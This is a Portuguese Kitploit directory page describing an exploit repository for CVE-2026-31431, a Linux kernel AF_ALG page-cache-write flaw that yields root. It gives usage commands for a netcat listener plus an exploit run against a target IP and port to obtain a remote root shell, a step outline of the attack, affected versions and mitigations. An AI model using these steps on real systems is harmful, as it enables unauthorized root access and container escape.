Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-31431-RCE-Exploit — Exploit de escalada de privilégios local para CVE-2026-31431, uma falha lógica no AF_ALG do kernel Linux que permite que usuários não privilegiados gravem 4 bytes no cache de páginas e obtenham root. Inclui script PoC e orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/m4xsec/cve-2026-31431-rce-exploit
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoRed TeamingEscape de ContêinerExploração de Binários
GitHubm4xsec/cve-2026-31431-rce-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-31431-RCE-Exploit

Exploit de escalada de privilégios local para CVE-2026-31431, uma falha lógica no AF_ALG do kernel Linux que permite que usuários não privilegiados gravem 4 bytes no cache de páginas e obtenham root. Inclui script PoC e orientações de mitigação.

Ver Repositório
72há 3 mesesAinda não revisado

🔴 CVE-2026-31431 — "Copy Fail"

Uma Falha Lógica de 9 Anos no Kernel Linux que Concede Root em Segundos

CVE CVSS Kernel Since


Visão Geral

Copy Fail é uma vulnerabilidade de escalonamento local de privilégios (LPE) de alta gravidade no subsistema criptográfico do kernel Linux (algif_aead). Descoberta e divulgada pela Theori (por meio de sua ferramenta de pesquisa de vulnerabilidades assistida por IA Xint Code) em 29 de abril de 2026, a falha permite que qualquer usuário local sem privilégios grave 4 bytes controlados no cache de páginas de qualquer arquivo legível — e aproveite isso para obter root em praticamente todas as principais distribuições Linux lançadas desde 2017.

Um exploit de prova de conceito funcional tem apenas ~732 bytes de Python.


Exploração

  1. Inicie o Listener Ncat
root@kitploit:~
sudo ncat -lvnp PORTA
  1. Execute o exploit na máquina alvo
root@kitploit:~
# Usando script Python
python3 CVE-2026-31431-Exploit.py IP PORTA

# Binário compilado
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORTA

🧬 Resumo Técnico

Como o Exploit Funciona (4 Etapas)

  1. Abra um socket AF_ALG e vincule a authencesn(hmac(sha256),cbc(aes))
  2. Faça splice das páginas de um binário setuid legível no socket
  3. A gravação de rascunho AEAD do kernel sobrescreve 4 bytes no cache de páginas desse binário
  4. Execute o binário setuid agora corrompido → shell root

Por Que É Perigoso

  • Sem janela de corrida — determinístico, funciona sempre
  • Sem necessidade de offset de kernel / bypass de KASLR
  • O mesmo exploit funciona em várias distros — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky, etc.
  • Escape de contêiner — o cache de páginas é compartilhado; uma gravação de dentro de um contêiner afeta o host
  • Sem modificação em disco — monitores de integridade de arquivos (AIDE, OSSEC, etc.) não detectarão
  • Sem rastro forense em disco

🎯 Versões Afetadas

Distribuições Confirmadamente Vulneráveis

  • Ubuntu 24.04 LTS
  • Amazon Linux 2023
  • RHEL 10.1
  • SUSE 16
  • Rocky Linux 9.7

Essencialmente toda distribuição Linux importante lançada desde 2017 é afetada.


🛡️ Mitigação

1. Correção (Recomendada)

Atualize seu kernel para uma versão que contenha o commit de correção fafe0fa2995a. A maioria das principais distribuições lançou ou está lançando pacotes de kernel atualizados.

2. Soluções Temporárias

Se você não puder corrigir imediatamente:

  • Bloqueie a criação de sockets AF_ALG por meio de política seccomp
  • Coloque o módulo algif_aead na lista negra:
    root@kitploit:~
    echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
    sudo modprobe -r algif_aead 2>/dev/null
    

⚠️ Aviso Legal

Este repositório é para fins educacionais e defensivos apenas. As informações aqui têm o objetivo de ajudar equipes de segurança a entender, detectar e mitigar o CVE-2026-31431. Sempre siga práticas de divulgação responsável e leis aplicáveis.


⭐ Dê uma estrela neste repositório para se manter atualizado sobre correções e orientações de detecção.

Baixar ferramenta
CampoDetalhe
ID CVECVE-2026-31431
Pontuação CVSS7.8 (ALTA)
TipoEscalonamento Local de Privilégios (LPE)
Componentealgif_aead — interface criptográfica AF_ALG do kernel Linux para espaço do usuário
Causa RaizFalha lógica no template AEAD authencesn; uma otimização in-place (commit 72548b093ee3, ago 2017) faz com que páginas do cache de páginas apareçam no scatterlist de destino gravável do kernel
PrimitivaGravação controlada de 4 bytes no cache de páginas de qualquer arquivo legível
Mecanismo do ExploitSocket AF_ALG → splice() → corrupção do cache de páginas de um binário setuid → root
Condição de Corrida?❌ Nenhuma — falha lógica direta, 100% confiável
Offset do Kernel Necessário?❌ Não
Commit de Correçãofafe0fa2995a (reverte a otimização de 2017)
AfetadasNão Afetadas
Kernel Linux 4.14 até 7.0-rcKernels anteriores a 4.14 (antes do commit de ago 2017)
Todas as 6.18.x anteriores a 6.18.226.18.22+ (corrigidas)
Todas as 6.19.x anteriores a 6.19.126.19.12+ (corrigidas)